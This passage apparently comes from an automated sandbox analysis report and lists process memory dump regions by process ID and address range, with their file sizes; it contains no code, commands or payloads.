                                                                                                                                                                                                                                                                                                                        • memory/3840-246-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          200KB

                                                                                                                                                                                                                                                                                                                        • memory/3840-299-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          200KB

                                                                                                                                                                                                                                                                                                                        • memory/3964-155-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3964-236-0x0000000002210000-0x000000000232B000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                                                                        • memory/3964-241-0x0000000002177000-0x0000000002209000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          584KB

                                                                                                                                                                                                                                                                                                                        • memory/4040-227-0x00000000056C0000-0x0000000005CD8000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                                                                                        • memory/4040-158-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4040-189-0x0000000000400000-0x0000000000885000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4.5MB

                                                                                                                                                                                                                                                                                                                        • memory/4040-238-0x0000000005E20000-0x0000000005E5C000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                                                                                                                        • memory/4040-235-0x0000000005CE0000-0x0000000005CF2000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                                                                                                        • memory/4040-237-0x0000000005D00000-0x0000000005E0A000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                                                                                        • memory/4040-225-0x0000000000400000-0x0000000000885000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4.5MB

                                                                                                                                                                                                                                                                                                                        • memory/4052-142-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4116-400-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4196-137-0x0000000000400000-0x0000000000438000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                                                                        • memory/4196-263-0x0000000003BF0000-0x0000000003E73000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                                                                                                                        • memory/4196-133-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4196-134-0x0000000000400000-0x0000000000438000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                                                                        • memory/4196-138-0x0000000003BF0000-0x0000000003E73000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                                                                                                                        • memory/4196-139-0x0000000000400000-0x0000000000438000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                                                                        • memory/4196-261-0x0000000000400000-0x0000000000438000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                                                                        • memory/4196-135-0x0000000000400000-0x0000000000438000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                                                                        • memory/4196-136-0x0000000000400000-0x0000000000438000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                                                                        • memory/4196-140-0x0000000003BF0000-0x0000000003E73000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                                                                                                                        • memory/4204-330-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                                                                                                        • memory/4204-329-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4212-277-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4216-280-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4316-163-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4324-331-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4436-141-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4460-283-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4552-240-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/4552-242-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/4552-243-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/4552-244-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/4552-294-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/4552-239-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4688-295-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4688-296-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                                                                        • memory/4700-442-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4960-194-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/4960-205-0x0000000000CA0000-0x0000000000CAE000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                                                                                                        • memory/5044-287-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5044-288-0x00000000030F0000-0x00000000040F0000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          16.0MB

                                                                                                                                                                                                                                                                                                                        • memory/5044-361-0x000000002DBE0000-0x000000002DC9C000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          752KB

                                                                                                                                                                                                                                                                                                                        • memory/5044-363-0x000000002E170000-0x000000002E217000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          668KB

                                                                                                                                                                                                                                                                                                                        • memory/5056-201-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5060-274-0x0000000000400000-0x0000000000A77000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                                                                                                                        • memory/5060-262-0x0000000000400000-0x0000000000A77000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                                                                                                                        • memory/5060-260-0x00000000001F0000-0x00000000001F9000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                                                                                                                        • memory/5060-169-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5060-276-0x0000000000C82000-0x0000000000C92000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                                                        • memory/5156-377-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5156-383-0x00000000027A0000-0x00000000037A0000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          16.0MB

                                                                                                                                                                                                                                                                                                                        • memory/5224-338-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/5224-333-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5224-337-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/5268-386-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5340-340-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5348-385-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5408-459-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5536-344-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5584-345-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5624-406-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5628-349-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5640-350-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5716-357-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/5716-352-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5716-355-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/5800-417-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/6052-366-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/6060-425-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/6072-367-0x0000000000000000-mapping.dmp